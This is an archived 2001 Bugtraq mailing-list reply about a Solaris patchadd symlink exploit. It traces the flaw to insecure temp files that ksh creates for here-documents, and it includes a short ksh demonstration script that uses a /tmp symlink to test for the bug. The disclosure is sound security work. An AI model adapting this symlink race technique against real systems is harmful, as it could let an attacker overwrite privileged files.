Bugtraq mailing list archives
Re: Solaris Patchadd symlink exploit.
From: psz () maths usyd edu au (Paul Szabo)
Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
Here is an exploit to an old bug for patchadd in Solaris. ... #See BID http://www.securityfocus.com/bid/2127
The bug is not in the patchadd script, but in the Korn shell ksh that creates "here documents" insecurely. Demonstration (ksh is vulnerable if the size of silly.1 is changed): #!/bin/ksh -x touch /tmp/silly.1 ln -s /tmp/silly.1 /tmp/sh$$.1 ls -l /tmp/silly.* /tmp/sh$$.* cat <<EOF Just some short text EOF ls -l /tmp/silly.* /tmp/sh$$.* rm /tmp/silly.* /tmp/sh$$.* Note that there is a similar bug in the Bourne shell sh. For a historical perspective see articles: http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385 () milan maths usyd edu au http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182 () milan maths usyd edu au http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620 () milan maths usyd edu au Cheers, Paul Szabo - psz () maths usyd edu au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia
Current thread:
- Solaris Patchadd symlink exploit. Larry W. Cashdollar (Aug 27)
- <Possible follow-ups>
- Re: Solaris Patchadd symlink exploit. Paul Szabo (Aug 27)
- Netscape 6.01A ksh "here document" vulnerability. Larry W. Cashdollar (Aug 28)